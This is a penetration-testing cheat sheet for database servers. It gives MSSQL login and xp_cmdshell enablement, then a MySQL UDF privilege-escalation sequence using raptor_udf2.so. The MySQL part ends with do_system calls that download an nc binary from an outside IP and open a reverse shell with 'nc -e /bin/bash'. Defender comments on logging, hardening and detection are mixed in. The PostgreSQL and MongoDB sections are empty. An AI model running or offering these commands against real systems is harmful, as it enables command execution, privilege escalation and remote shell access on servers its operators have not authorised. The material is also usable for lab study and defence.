Databases

MSSQL

Login:

mssqlclient.py username:password@<targetName or address>
 
OR 
edit the /etc/freetds/freetds.conf file:
[HOST]
        host = IP
        port = 1435
        tds version = 8.0
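create a ~/.sqshrc file (the password is stored in it in plain text, so keep the file readable only by its owner, e.g. chmod 600 ~/.sqshrc):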
\set username=USERNAME
\set password=PASSWORD
\set style=vert

Privesc/ execution:

-- Enables xp_cmdshell (disabled by default) and then runs one OS command through it.
-- Changing options with sp_configure and running RECONFIGURE needs the ALTER SETTINGS
-- permission, which the sysadmin and serveradmin fixed server roles hold.
-- Defender note: each sp_configure change is written to the SQL Server error log
-- (message 15457, "Configuration option ... changed from 0 to 1"), so an unexpected
-- change of xp_cmdshell to 1 is a good alert condition. Keeping xp_cmdshell off and
-- running the service under a low-privileged account limits what this sequence gives.
--
-- The option's full name is 'show advanced options'; sp_configure accepts a unique part of it.
-- xp_cmdshell is an advanced option, so advanced options are made visible first.
EXEC sp_configure 'show advanced option', '1';
go
-- Apply the pending configuration value.
RECONFIGURE WITH OVERRIDE;
go
-- Set xp_cmdshell to 1 (enabled).
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
-- With a single argument sp_configure only reports the option's current values.
EXEC sp_configure 'show advanced option';
go
-------------[CHECK IT WORKS]------------
-- For a sysadmin caller the command runs as the SQL Server service account,
-- so the output shows which Windows account that is.
xp_cmdshell 'whoami';

MySQL / MariaDB

Login:

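# The host option is lowercase -h; uppercase -H is the client's --html output switch.
# A password written after -p ends up in shell history and can show in the process list;
# a bare -p makes the client prompt for it instead.
mysql -uUSER -pPASS -h HOST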

Commands:

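-- Basic enumeration once connected. DATABASE and table are placeholders.
-- The statement that lists databases is SHOW DATABASES (plural).
show databases;
use DATABASE;
show tables;
select * from table;
-- Directory the server loads UDF shared libraries from.
show variables like 'plugin_dir';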

UDF:

-- Copies a shared library into the server's plugin directory through SQL, registers a
-- function from it, and uses that function to run OS commands as the account mysqld runs as.
-- What the statements depend on:
--   * load_file() and INTO DUMPFILE need the FILE privilege and are limited by secure_file_priv;
--   * the plugin directory must be writable by the account mysqld runs as;
--   * CREATE FUNCTION ... SONAME only loads libraries located in plugin_dir.
-- Hardening: do not grant FILE to application accounts, set secure_file_priv to a dedicated
-- directory, keep plugin_dir owned by root and not writable by the mysqld account, and never
-- run mysqld as root.
-- Detection: unexpected rows in mysql.func, new .so files in plugin_dir, and mysqld spawning
-- shell, wget or nc child processes.

-- Scratch table holding the library's bytes in one blob column.
create table foo(line blob);

-- Read the library from disk into the table (the file was placed under /var/www beforehand).
insert into foo values(load_file('/var/www/raptor_udf2.so'));

-- Write the blob back out as a file in the plugin directory; the path used here has to be
-- the value reported by plugin_dir.
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

-- Register the library's do_system symbol as a SQL function.
create function do_system returns integer soname 'raptor_udf2.so';

-- mysql.func lists the registered UDFs; this is also the table a defender audits.
select * from mysql.func;

-- The function is declared to return an integer, so command output is written to a file
-- rather than returned to the client.
select do_system('id > /var/www/out; chown www-data.www-data /var/www/out');

-- Fetches an nc binary from 192.168.49.246:8295 and starts a shell back to that address.
-- Egress filtering on the database host and alerting on mysqld child processes cover this step.
select do_system('wget http://192.168.49.246:8295/nc -O /var/www/nc');
select do_system('/var/www/nc 192.168.49.246 8295 -e /bin/bash');

PostgreSQL

Login:

MongoDB

Login:
